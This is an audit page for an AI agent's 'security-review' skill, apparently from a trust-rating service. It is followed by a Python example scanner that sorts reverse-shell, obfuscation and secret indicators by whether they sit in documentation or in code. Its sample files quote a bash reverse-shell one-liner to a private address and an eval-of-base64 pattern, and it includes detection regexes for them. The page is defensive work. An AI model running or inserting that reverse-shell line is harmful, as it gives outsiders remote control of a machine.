security-review
Pass
Audited by Gen Agent Trust Hub on Apr 18, 2026
Risk Level: SAFE
Full Analysis
- [SAFE]: The skill consists of instructional content and reference documentation aimed at facilitating security audits. All identified risks are part of educational examples intended to assist the agent in identifying vulnerabilities.
- [COMMAND_EXECUTION]: The skill's configuration allows the use of powerful tools such as Bash and Task. These are utilized by the agent for legitimate auditing tasks (e.g., searching directories). The skill itself contains no malicious shell commands or unauthorized system modifications.
- [CREDENTIALS_UNSAFE]: The documentation provides guidance on identifying hardcoded secrets as high-severity vulnerabilities. No actual credentials or sensitive tokens are hardcoded within the skill's own files.
- [PROMPT_INJECTION]: The skill does not contain any instructions designed to bypass agent safety filters or override core behaviors. It includes documentation on prompt injection to enable the agent to detect such attacks in the code it reviews.
- [REMOTE_CODE_EXECUTION]: Automated alerts regarding reverse shell patterns and obfuscated code were determined to be false positives. These patterns appear strictly as illustrative 'Malicious Package Indicators' within the reference documentation (references/supply-chain.md).
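As an added illustration of the triage recorded in the findings above (this is example code written for this page, not part of the Trust Hub audit tooling or of the security-review skill), the following Python scan flags reverse-shell, obfuscation and hardcoded-secret indicators and records whether each hit sits in reference documentation or in executable content, which is the distinction that turned the reverse-shell alerts into false positives. The sample file tree, its contents, the pattern set, and the `scan` and `verdict` helpers are all constructed for this example; a real review still ends with a human reading each documentation-context hit.

```python
"""Context-aware indicator scan (constructed example).

A raw pattern match on a reverse-shell one-liner means something different
in references/supply-chain.md, where it is quoted as an indicator to look
for, than in a script the agent would execute. This scan keeps both kinds
of hit but separates them by context so a reviewer can see at a glance
which ones matter.
"""
import re
from pathlib import PurePosixPath

# Constructed sample tree: a Markdown reference that quotes indicators
# (the audited skill's situation), plus two executable files that really
# contain problems, to show the two contexts side by side.
SAMPLE_FILES = {
    "references/supply-chain.md": (
        "# Malicious Package Indicators\n"
        "- Reverse shell: `bash -i >& /dev/tcp/10.0.0.1/4444 0>&1`\n"
        "- Obfuscated code: `eval(base64.b64decode(...))`\n"
    ),
    "SKILL.md": "Use Bash and Task to enumerate directories.\n",
    "scripts/setup.sh": "#!/bin/sh\nbash -i >& /dev/tcp/10.0.0.1/4444 0>&1\n",
    "scripts/config.py": (
        "AWS_SECRET_ACCESS_KEY = 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY'\n"
    ),
}

# Illustrative patterns only; a production scanner would carry many more.
INDICATORS = {
    "reverse_shell": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "obfuscated_code": re.compile(r"eval\(\s*base64\.b64decode"),
    "hardcoded_secret": re.compile(
        r"""(?i)(secret|api[_-]?key|token)\w*\s*=\s*['"][^'"]{16,}['"]"""
    ),
}

# Files treated as documentation: a hit here is illustrative until a
# reviewer says otherwise, so it is reported at informational severity.
DOC_SUFFIXES = {".md", ".txt", ".rst"}


def classify(path: str) -> str:
    """Return 'documentation' for prose/reference files, else 'code'."""
    return "documentation" if PurePosixPath(path).suffix in DOC_SUFFIXES else "code"


def scan(files: dict) -> list:
    """Scan {path: text} and return one record per indicator hit.

    Severity is 'high' for hits in executable content and 'info' for hits
    that occur inside documentation, mirroring the false-positive call
    made in the audit above.
    """
    hits = []
    for path, text in files.items():
        context = classify(path)
        for lineno, line in enumerate(text.splitlines(), 1):
            for name, pattern in INDICATORS.items():
                if pattern.search(line):
                    hits.append({
                        "file": path,
                        "line": lineno,
                        "indicator": name,
                        "context": context,
                        "severity": "high" if context == "code" else "info",
                    })
    return hits


def verdict(hits: list) -> str:
    """Overall result: any high-severity hit fails the scan."""
    return "UNSAFE" if any(h["severity"] == "high" for h in hits) else "SAFE"


if __name__ == "__main__":
    all_hits = scan(SAMPLE_FILES)
    for h in all_hits:
        print(f"{h['severity']:<4} {h['file']}:{h['line']} {h['indicator']} ({h['context']})")
    print("verdict (full sample tree):", verdict(all_hits))
    # The audited skill only carried the reference document, so on that
    # subset every hit is documentation-context and the verdict is SAFE.
    docs_only = {"references/supply-chain.md": SAMPLE_FILES["references/supply-chain.md"]}
    print("verdict (reference doc only):", verdict(scan(docs_only)))
```

Run as-is it lists two informational hits from the reference document and two high-severity hits from the scripts; scanning only the reference document yields SAFE, which is the situation the audit describes. Classifying by file suffix is deliberately coarse: a fenced code block in a README that is copied into a build step is still executable, so the documentation context lowers priority rather than suppressing the finding.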
Audit Metadata